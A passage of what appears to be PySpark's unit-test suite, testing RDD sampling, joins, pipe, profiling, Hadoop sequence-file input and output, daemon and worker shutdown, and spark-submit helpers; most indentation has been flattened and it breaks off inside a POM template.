wo_dup = rdd.sample(False, 0.1, 2).collect()
self.assertSetEqual(set(wo), set(wo_dup))
wr = rdd.sample(True, 0.2, 5).collect()
wr_dup = rdd.sample(True, 0.2, 5).collect()
self.assertSetEqual(set(wr), set(wr_dup))
wo_s10 = rdd.sample(False, 0.3, 10).collect()
wo_s20 = rdd.sample(False, 0.3, 20).collect()
self.assertNotEqual(set(wo_s10), set(wo_s20))
wr_s11 = rdd.sample(True, 0.4, 11).collect()
wr_s21 = rdd.sample(True, 0.4, 21).collect()
self.assertNotEqual(set(wr_s11), set(wr_s21))
def test_null_in_rdd(self):
jrdd = self.sc._jvm.PythonUtils.generateRDDWithNull(self.sc._jsc)
rdd = RDD(jrdd, self.sc, UTF8Deserializer())
self.assertEqual([u"a", None, u"b"], rdd.collect())
rdd = RDD(jrdd, self.sc, NoOpSerializer())
self.assertEqual([b"a", None, b"b"], rdd.collect())
def test_multiple_python_java_RDD_conversions(self):
# Regression test for SPARK-5361
data = [
(u'1', {u'director': u'David Lean'}),
(u'2', {u'director': u'Andrew Dominik'})
]
data_rdd = self.sc.parallelize(data)
data_java_rdd = data_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
# conversion between python and java RDD threw exceptions
data_java_rdd = converted_rdd._to_java_object_rdd()
data_python_rdd = self.sc._jvm.SerDe.javaToPython(data_java_rdd)
converted_rdd = RDD(data_python_rdd, self.sc)
self.assertEqual(2, converted_rdd.count())
def test_narrow_dependency_in_join(self):
rdd = self.sc.parallelize(range(10)).map(lambda x: (x, x))
parted = rdd.partitionBy(2)
self.assertEqual(2, parted.union(parted).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, parted.union(rdd).getNumPartitions())
self.assertEqual(rdd.getNumPartitions() + 2, rdd.union(parted).getNumPartitions())
tracker = self.sc.statusTracker()
self.sc.setJobGroup("test1", "test", True)
d = sorted(parted.join(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test1")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test2", "test", True)
d = sorted(parted.join(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual((0, (0, 0)), d[0])
jobId = tracker.getJobIdsForGroup("test2")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test3", "test", True)
d = sorted(parted.cogroup(parted).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test3")[0]
self.assertEqual(2, len(tracker.getJobInfo(jobId).stageIds))
self.sc.setJobGroup("test4", "test", True)
d = sorted(parted.cogroup(rdd).collect())
self.assertEqual(10, len(d))
self.assertEqual([[0], [0]], list(map(list, d[0][1])))
jobId = tracker.getJobIdsForGroup("test4")[0]
self.assertEqual(3, len(tracker.getJobInfo(jobId).stageIds))
# Regression test for SPARK-6294
def test_take_on_jrdd(self):
rdd = self.sc.parallelize(xrange(1 << 20)).map(lambda x: str(x))
rdd._jrdd.first()
def test_sortByKey_uses_all_partitions_not_only_first_and_last(self):
# Regression test for SPARK-5969
seq = [(i * 59 % 101, i) for i in range(101)] # unsorted sequence
rdd = self.sc.parallelize(seq)
for ascending in [True, False]:
sort = rdd.sortByKey(ascending=ascending, numPartitions=5)
self.assertEqual(sort.collect(), sorted(seq, reverse=not ascending))
sizes = sort.glom().map(len).collect()
for size in sizes:
self.assertGreater(size, 0)
def test_pipe_functions(self):
data = ['1', '2', '3']
rdd = self.sc.parallelize(data)
with QuietTest(self.sc):
self.assertEqual([], rdd.pipe('cc').collect())
self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
result = rdd.pipe('cat').collect()
result.sort()
for x, y in zip(data, result):
self.assertEqual(x, y)
self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_profiler(self):
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
id, profiler, _ = profilers[0]
stats = profiler.stats()
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
old_stdout = sys.stdout
sys.stdout = io = StringIO()
self.sc.show_profiles()
self.assertTrue("heavy_foo" in io.getvalue())
sys.stdout = old_stdout
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
def test_custom_profiler(self):
class TestCustomProfiler(BasicProfiler):
def show(self, id):
self.result = "Custom formatting"
self.sc.profiler_collector.profiler_cls = TestCustomProfiler
self.do_computation()
profilers = self.sc.profiler_collector.profilers
self.assertEqual(1, len(profilers))
_, profiler, _ = profilers[0]
self.assertTrue(isinstance(profiler, TestCustomProfiler))
self.sc.show_profiles()
self.assertEqual("Custom formatting", profiler.result)
def do_computation(self):
def heavy_foo(x):
for i in range(1 << 18):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.assertEqual(nulls, en)
maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
for v in maps:
self.assertTrue(v in em)
# arrays get pickled to tuples by default
tuples = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable").collect())
et = [(1, ()),
(2, (3.0, 4.0, 5.0)),
(3, (4.0, 5.0, 6.0))]
self.assertEqual(tuples, et)
# with custom converters, primitive arrays can stay as arrays
arrays = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfarray/",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
ea = [(1, array('d')),
(2, array('d', [3.0, 4.0, 5.0])),
(3, array('d', [4.0, 5.0, 6.0]))]
self.assertEqual(arrays, ea)
clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable").collect())
cname = u'org.apache.spark.api.python.TestWritable'
ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
(u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
(u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
(u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
(u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
self.assertEqual(clazz, ec)
unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
"org.apache.hadoop.io.Text",
"org.apache.spark.api.python.TestWritable",
).collect())
self.assertEqual(unbatched_clazz, ec)
def test_oldhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
oldconf = {"mapred.input.dir": hellopath}
hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=oldconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newhadoop(self):
basepath = self.tempdir.name
ints = sorted(self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
newconf = {"mapred.input.dir": hellopath}
hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
"org.apache.hadoop.io.LongWritable",
"org.apache.hadoop.io.Text",
conf=newconf).collect()
result = [(0, u'Hello World!')]
self.assertEqual(hello, result)
def test_newolderror(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_bad_inputs(self):
basepath = self.tempdir.name
self.assertRaises(Exception, lambda: self.sc.sequenceFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.NotValidWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.hadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapred.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
basepath + "/sftestdata/sfint/",
"org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
maps = sorted(self.sc.sequenceFile(
basepath + "/sftestdata/sfmap/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
em = [(u'\x01', []),
(u'\x01', [3.0]),
(u'\x02', [1.0]),
(u'\x02', [1.0]),
(u'\x03', [2.0])]
self.assertEqual(maps, em)
def test_binary_files(self):
path = os.path.join(self.tempdir.name, "binaryfiles")
os.mkdir(path)
data = b"short binary data"
with open(os.path.join(path, "part-0000"), 'wb') as f:
f.write(data)
[(p, d)] = self.sc.binaryFiles(path).collect()
self.assertTrue(p.endswith("part-0000"))
self.assertEqual(d, data)
def test_binary_records(self):
path = os.path.join(self.tempdir.name, "binaryrecords")
os.mkdir(path)
with open(os.path.join(path, "part-0000"), 'w') as f:
for i in range(100):
f.write('%04d' % i)
result = self.sc.binaryRecords(path, 4).map(int).collect()
self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
def setUp(self):
self.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.tempdir.name)
def tearDown(self):
shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertTrue(v, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertTrue(v, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertTrue(v, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
@unittest.skipIf(sys.version >= "3", "serialize of array")
def test_newhadoop_with_array(self):
basepath = self.tempdir.name
# use custom ArrayWritable types and converters to handle arrays
array_data = [(1, array('d')),
(1, array('d', [1.0, 2.0, 3.0])),
(2, array('d', [3.0, 4.0, 5.0]))]
self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
self.assertEqual(result, array_data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
conf,
valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.spark.api.python.DoubleArrayWritable",
valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
conf=input_conf).collect())
self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
def test_reserialization(self):
basepath = self.tempdir.name
x = range(1, 5)
y = range(1001, 1005)
data = list(zip(x, y))
rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
self.assertEqual(result1, data)
rdd.saveAsHadoopFile(
basepath + "/reserialize/hadoop",
"org.apache.hadoop.mapred.SequenceFileOutputFormat")
result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
self.assertEqual(result2, data)
rdd.saveAsNewAPIHadoopFile(
basepath + "/reserialize/newhadoop",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
self.assertEqual(result3, data)
conf4 = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/dataset"}
rdd.saveAsHadoopDataset(conf4)
result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
self.assertEqual(result4, data)
conf5 = {"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.dir": basepath + "/reserialize/newdataset"}
rdd.saveAsNewAPIHadoopDataset(conf5)
result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
def connect(self, port):
from socket import socket, AF_INET, SOCK_STREAM
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('127.0.0.1', port))
# send a split index of -1 to shutdown the worker
sock.send(b"\xFF\xFF\xFF\xFF")
sock.close()
return True
def do_termination_test(self, terminator):
from subprocess import Popen, PIPE
from errno import ECONNREFUSED
# start daemon
daemon_path = os.path.join(os.path.dirname(__file__), "daemon.py")
python_exec = sys.executable or os.environ.get("PYSPARK_PYTHON")
daemon = Popen([python_exec, daemon_path], stdin=PIPE, stdout=PIPE)
# read the port number
port = read_int(daemon.stdout)
# daemon should accept connections
self.assertTrue(self.connect(port))
# request shutdown
terminator(daemon)
time.sleep(1)
# daemon should no longer accept connections
try:
self.connect(port)
except EnvironmentError as exception:
self.assertEqual(exception.errno, ECONNREFUSED)
else:
self.fail("Expected EnvironmentError to be raised")
def test_termination_stdin(self):
"""Ensure that daemon and workers terminate when stdin is closed."""
self.do_termination_test(lambda daemon: daemon.stdin.close())
def test_termination_sigterm(self):
"""Ensure that daemon and workers terminate on SIGTERM."""
from signal import SIGTERM
self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
def test_cancel_task(self):
temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
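    # Illustration of the '|' margin stripping shared by createTempFile and
    # createFileInZip (a comment-only sketch, not executed by the tests):
    #   pattern = re.compile(r'^ *\|', re.MULTILINE)
    #   re.sub(pattern, '', "  |line one\n  |line two".strip())
    #   # -> 'line one\nline two'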
def create_spark_package(self, artifact_name):
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
